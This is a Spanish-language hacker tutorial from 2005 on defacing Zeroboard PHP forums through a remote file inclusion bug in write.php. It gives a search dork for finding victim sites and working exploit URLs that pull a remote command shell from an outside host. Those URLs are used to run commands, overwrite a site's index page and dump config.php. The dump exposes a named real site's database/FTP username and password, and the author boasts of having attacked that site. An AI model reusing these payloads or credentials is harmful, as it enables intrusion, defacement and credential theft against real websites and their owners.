############################################################################

*/ Http://Www.DefacersMexico.Org */

Defacing en Zeroboard

############################################################################
sh-2.05b$ ./ Escrito por Status-x [ phr4xz@gmail.com ] - Mexico
############################################################################

****************************************************************************
[ Contenido ]
[ 1 ] .- Introduccion.............................................. Status-x
[ 2 ] .- Que es Zeroboard.......................................... Status-x
[ 3 ] .- Buscando Victimas......................................... Status-x
[ 4 ] .- Explorando el Bug......................................... Status-x
[ 5 ] .- Tips De Deface............................................ Status-x
[ 7 ] .- Despedida................................................. Status-x
****************************************************************************
############################################################################
sh-2.05b$ ./ Introduccion
############################################################################
Que onda chavos, pues al parecer veo que los tutoriales estan siendo distri
buidos rapidamente, claro no faltara el pendejo que le cambie los datos :)
pero en fin esta vez trataremos del deface con rfi en Zeroboard un sistema
de foros bastante conocido en Korea :), gracias a todos los que me apoyan
dando a conocer la web publicando los tutoriales de verdad muchas gracias
es por eso que esta vez les comparto esta tecnica :) comenzemos...

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
sh-2.05b$ ./ Que es Zeroboard
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Zeroboard es un sistema de foros desarrollado en PHP y al que se le han

encontrado multiples fallas en los ultimos meses, este sistema es bastante
conocido en Korea, permite icnluir comentarios, incluir smilies, e incluso
una de las skins es tambien vulnerable a Remote File Inclusion.

############################################################################
sh-2.05b$ ./ Buscando Victimas
############################################################################

Bien dado que el sistema es usado solo en Korea podriamos buscar sitios
de la siguiente manera:
****************************
allinurl: /zboard/zboard.php
****************************
Con lo cual la url para buscar sitios seria de la siguiente manera:

**************************************************************************
http://www.google.co.kr/search?hl=ko&q=allinurl%3A+zboard%2Fzboard.php&lr=
**************************************************************************
Listo tenemos ya algunas webs con las cuales podremos practicar :)

############################################################################
sh-2.05b$ ./ Explorando el BUG
############################################################################
Bien el bug se encuentra en el archivo write.php en las ultimas lineas jeje
primero tenemos unas lineas que no se entienden y despues la variable $dir
que es la causante del fallo :)
***********************************

include $dir."/write.php";
***********************************
Por lo que nuestro deface lo haremos de la siguiente manera:

http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=uname -a;pwd;id

Y vemos que nos sale lo siguiente:

Linux www.somedomain.com 2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686

i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)

El cual nos indica: servidor; directorio actual y usuario :)

Sin embargo vemos que esta vez nos tenemos permisos de escritura :(
Sin embargo si los TUVIERAMOS podriamos hacer el deface de la siguiente mane
ra:

http://juotte.com/bbs/include
/write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd /home/juotte/ww
w;echo Status-x was Here >index.html

Y nuestro deface se veria en la pagina principal :) espero que les sirva de

algo y que les ayude a subir sus defacements y pa que me alcanzen en el Top
de Zone-H :)
############################################################################
sh-2.05b$ ./ Tips de Deface
############################################################################
Espero que las personitas que esten leyendo este tuto se queden hasta esta
parte, la verdad es que este Bug ya lo he explorado bastante sin embargo

este fallo lo encontre mientras exploraba las configuraciones, etcetera

aun hay infinidad de webs vulnerables, bien esta vez el tip de deface
sera el siguiente:
Zeroboard como deben de suponer usa bases de datos para poder funcionar por lo
que siempre habra un usuario y un password:
Sin embargo ZeroBoard usa un config.php el cual contiene el user y password
de la base de datos pero posiblemente tambien el del FTP, en los sitios
que probe siempre me dejo loguearme al FTP :) y lo mejor de todo es que
al ser este un error del config descubierto por mi pues ha resultado bastan
te util a la hora de hacer el deface ya que solo el crew int3rc3pt0r tiene
conocimiento de el ;)
Para localizar el config.php lo haremos de la siguiente manera:

http://localhost.com/zboard/include/
write.php?dir=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd%20..;cat%20confi
g.php

Y en el caso de la web de ejemplo nos saldra algo asi:

*************************************
<?
localhost
juotte
<--------------- user
juotte7034 <--------------- password
juotte
?>
*************************************

Y listo tenemos el user y pass del FTP

Disculpen si la web de ejemplo ya no agarra el pass del FTP pero es que ya fue
atacada por mi con anterioridad sin embargo no pierdan la esperanza generalmente
algunos .snu.kr o ac.kr NO tienen FTP por lo que no podran usar este tip
sin embargo sitios .kr .org .com .net si lo tienen y podran aplicarlo ;)

############################################################################
sh-2.05b$ ./ Despedida
############################################################################
Un tutorial mas para la web DefacersMexico.Org, al parecer ya son varias las
webs que estan publicando mis tutoriales:
Tbc-Labz.Org
MbyteSecurity.Org
NeoSecurityTeam.Net
A ellos gracias por publicar mis tutoriales y por favor recomienden el sitio ;)
y un saludo para mi novia Mariana que espero algun dia entienda que yo la quiero
muchisimo aunque algunas veces no sepa como demostrarselo :(
Saludos ;)
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques ;)
############################################################################